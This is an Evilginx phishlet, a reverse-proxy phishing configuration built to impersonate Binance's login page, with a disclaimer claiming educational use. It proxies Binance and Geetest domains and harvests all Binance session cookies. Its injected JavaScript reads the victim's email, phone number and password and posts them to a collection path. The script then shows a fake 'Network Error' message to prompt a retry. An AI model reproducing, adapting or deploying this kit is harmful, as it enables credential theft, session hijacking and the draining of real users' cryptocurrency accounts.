# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. # PLEASE DO NOT MISUSE THIS PHISHLET. # Don't Forget To set "next_lure" Params to your second lure ( Just to redirect user on failed captcha) # Use This Command To set the domain params from the evilginx command line. # Where ID is lure id number, and "https://mylure.com/tyghh" is the another lure of evilginx for same phishlet. # Use shortened URL from the another lure , And then add that shortened url as "next_lure" parameter # lures edit params ID next_lure=https://mylure.com/tyghh #Always use shortned url's to add in redirect_url in lures, ( There is a login issue in evilginx, Which sometime fails to redirect if you uses same domain as in hosts list, So use shortened urls of your redirect path) author: '@test' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.com', session: true, is_landing: true} - {phish_sub: 'www', orig_sub: 'www', domain: 'binance.com', session: true, is_landing: false} - {phish_sub: '', orig_sub: '', domain: 'binance.com', session: true, is_landing: false} - {phish_sub: 'api', orig_sub: 'api', domain: 'geetest.com', session: false, is_landing: false} - {phish_sub: 'bin', orig_sub: 'bin', domain: 'bnbstatic.com', session: false, is_landing: false} - {phish_sub: 'static', orig_sub: 'static', domain: 'geetest.com', session: false, is_landing: false} - {phish_sub: 'monitor', orig_sub: 'monitor', domain: 'geetest.com', session: false, is_landing: false} - {phish_sub: 'sensors', orig_sub: 'sensors', domain: 'binance.cloud', session: false, is_landing: false} - {phish_sub: 'frontend-m', orig_sub: 'frontend-m', domain: 'binance.cloud', session: false, is_landing: false} - {phish_sub: 'm', orig_sub: 'report', domain: 'binance.gg', session: true, is_landing: false} # Captcha is failing Because of below lines in js. #https://report.binance.gg # geetest.com is creating issues. # static\.geetest\.com #https://frontend-m.binance.cloud/monitor/v1/log sub_filters: - {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https://{hostname}/monitor/v1/log', replace: 'https://{hostname}/monitor/v1/log', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'bin.bnbstatic.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https://{hostname}/monitor/v1/log', replace: 'https://{hostname}/monitor/v1/log', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: '', domain: 'geetest.com', search: 'geetest.com', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'static\.geetest\.com', replace: 'static\.instaconnect\.ga', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'report', domain: 'binance.gg', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'report', domain: 'binance.gg', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'report', domain: 'binance.gg', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: '{hostname}', replace: '{hostname}', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'www', domain: 'binance.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'www', domain: 'binance.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'www', domain: 'binance.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'api', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'api', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'api', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'accounts.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: '', domain: 'geetest.com', search: 'geetest.com', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'static\.geetest\.com', replace: 'static\.instaconnect\.ga', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'report', domain: 'binance.gg', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'report', domain: 'binance.gg', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'report', domain: 'binance.gg', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: '{hostname}', replace: '{hostname}', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'frontend-m', domain: 'binance.cloud', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/javascript', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'www', domain: 'binance.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'www', domain: 'binance.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'www', domain: 'binance.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'accounts', domain: 'binance.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'api', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'api', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'api', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'static', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'static', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'sensors', domain: 'binance.cloud', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'bin', domain: 'bnbstatic.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.binance.com', orig_sub: 'monitor', domain: 'geetest.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} auth_tokens: - domain: '.binance.com' keys: ['.*,regexp'] auth_urls: - '/my/dashboard' - '/dashboard/.*' credentials: username: key: 'leaked_email' search: '(.*)' type: 'post' password: key: 'leaked_password' search: '(.*)' type: 'post' custom: - key: 'mobile' search: '(.*)' type: 'post' - key: 'mobileCode' search: '(.*)' type: 'post' - key: 'email' search: '(.*)' type: 'post' login: domain: 'accounts.binance.com' path: '/en/login' js_inject: - trigger_domains: ["accounts.binance.com"] trigger_paths: ["/login","/login.*"] trigger_params: [next_lure] script: | function lp(){ var submit = document.querySelectorAll('button[type=submit]')[0]; submit.setAttribute("onclick", "send_email(); send_mobile();"); return; } function send_email(){ var password = document.getElementsByName("password")[0].value; var email = document.getElementsByName("email")[0].value; var xhr = new XMLHttpRequest(); xhr.open("POST", '/get-pass', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("leaked_password="+encodeURIComponent(password)+" &"+" leaked_email="+encodeURIComponent(email)); var elem1 = document.getElementsByClassName("geetest_panel_error")[0]; elem1.parentNode.removeChild(elem1); var div = document.createElement('div'); div.innerHTML = `
Network Error !
Please Try Again
Retry
11
`; document.getElementsByClassName("geetest_panel_box")[0].appendChild(div); return; } function send_mobile(){ var password = document.getElementsByName("password")[0].value; var mobileCountry = document.getElementsByClassName("css-167bcsx")[0].value; var mobileNumber = document.getElementsByName("mobile")[0].value; var xhr = new XMLHttpRequest(); xhr.open("POST", '/get-pass', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("leaked_password="+encodeURIComponent(password)+" &"+" mobileCode="+encodeURIComponent(mobileCountry)+" &"+" mobile="+encodeURIComponent(mobileNumber)); var elem1 = document.getElementsByClassName("geetest_panel_error")[0]; elem1.parentNode.removeChild(elem1); var div = document.createElement('div'); div.innerHTML = `
Network Error !
Please Try Again
Retry
11
`; document.getElementsByClassName("geetest_panel_box")[0].appendChild(div); return; } setTimeout(function(){ lp(); }, 4000); - trigger_domains: ["accounts.binance.com"] trigger_paths: ["/login","/login.*"] trigger_params: [domain] script: | function lp2(){ var link1 = "{domain}" var link2 = document.getElementsByClassName("css-vurnku")[0]; link.textContent = ("//accounts."+link1) } setTimeout(function(){ lp2(); }, 100);